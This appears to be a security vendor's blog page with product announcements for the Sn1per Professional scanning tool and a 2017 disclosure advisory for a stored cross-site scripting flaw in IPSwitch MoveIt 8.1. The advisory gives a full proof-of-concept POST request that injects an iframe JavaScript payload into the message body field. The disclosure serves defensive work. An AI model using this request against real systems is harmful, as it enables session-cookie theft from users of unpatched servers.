Continuous Attack Surface Management (ASM) and reduction has become a crucial function for every organization to gain visibility of their perimeter security. Having the right tools and processes in place is vital to detecting new vulnerabilities before attackers do. In this blog post, we will outline the basic steps for discovering the attack surface with Sn1per Professional v9.0.
All posts tagged: vulnerability
xer0dayz Blog
Sn1per Professional Port Scanner Add-on Released!
Leverage the full power of NMap with the new “Port Scanner Add-on” for Sn1per Professional. Easily customize each NMap scan to meet your needs! Select from over 40+ hand picked scan profiles or select and run any NMap script from the drop-down menu easily. Select the multi-target list selection to scan all hosts in your workspace with a single click. Each scan produces a high quality HTML report for easy viewing and organization of all data. You can also update your Sn1per Professional port and NMap host data by selecting the “Update” checkbox. Getting the most out of NMap has never been easier or more powerful!
Sn1per Professional Nessus Add-on Released!
Scan for the latest vulnerabilities easily using Nessus and import vulnerability data with detailed HTML/CSV reports directly into Sn1per Professional! The Nessus Add-on is a must have for serious security professionals, bug bounty researchers and penetration testers alike!
Features
- Initiate Nessus vulnerability scans from Sn1per
- Import vulnerability data from Nessus into Sn1per Professional
- Download Nessus vulnerability reports in HTML and CSV format
Screenshots
Demo
Buy now!
As always, feel free to reach out to us at [email protected] with any questions!
Sn1per Professional v6.0 now available!
Sn1per Professional v6.0 is now available from the XeroSecurity website.
This is a BIG release with tons of new features and improvements, including:
- 100% responsive web UI resizes to fit any resolution or device.
- New scan progress bar indicates overall scan status to ensure 100% scan coverage of the entire workspace.
- Improved scan dashboard gives high level overview of workspace, including downloadable lists to all domains, scanned targets and unscanned targets. These can be easily referenced and used to scan the entire attack surface using Sn1per.
- New reports menu includes links to all Sn1per console reports which can be downloaded and viewed from the main report.
- New sidebar shortcuts added to both the main Sn1per report and all detailed host reports to quickly jump to each section of the report.
- Slideshow for all gathered screenshots
- Improved host table allows searching for scan mode tags, IP/DNS, HTTP titles, status codes, HTTP headers, WAF detection and open ports.
- New quick links for both the HTTP and HTTPS versions for each host in the host table.
- New scan tags to indicate which hosts has been scanned and which mode (ie. Stealth, Web, Portscan, Bruteforce, etc.) and which are new in the host table section of the report.
- New email security section indicates any email spoofing vulnerabilities for the workspace.
- New takeovers security section indicates any potential domain takeovers or hijacking vulnerabilities.
- New HTML5 notepad saves automatically to the main report elevating the need to save your work (keep in mind, it uses the local browser cache, so switching browsers or clearing your browser cache will remove your notes!).
- New detailed host reports are now separate from the main report and include the following features:
- 34 customized recon links.
- 26 customized Google dork links.
- HTTP/HTTPS quick links.
- Reports menu to download the full HTML console reports for each host.
- New sidebar links for each detailed host report to quickly jump to each section of the report.
- HTTP/HTTPS screenshots
- DNS
- Sub-domains
- Open ports
- New links to full NMap HTML host reports.
- Fingerprint info
- HTTP headers
- Web files
- Web URL’s
- New links to download all discovered URL’s for each host
- SSL/TLS info
Documentation
For all questions regarding payment, licensing, installation or general usage, refer to our online documentation for more info or contact us at [email protected].
Purchase Link
IPSwitch MoveIt Stored Cross Site Scripting (XSS)
Date: 1-31-2017
Software Link: https://www.ipswitch.com/moveit
Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable)
Exploit Author: [email protected]
Contact: https://twitter.com/crowdshield
Vendor Homepage: https://www.ipswitch.com
Category: Webapps
Attack Type: Remote
Impact: Data/Cookie Theft
Description
IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks.
Proof of Concept
The vulnerability lies in the Send Message -> Body Text Area input field.
POST /human.aspx?r=692492538 HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://host.com/human.aspx?r=510324925
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 598
czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=<iframe/src=javascript:alert(1)>&attachment=&opt07=1&arg05_Send=Send
Solution
Update to version 9.5
Disclosure Timeline
1/30/2017 – Disclosed details of vulnerability to IPSwitch.
1/31/2017 – IPSwitch confirmed the vulnerability and verified the fix as of version 9.5 and approved public disclosure of the vulnerability.
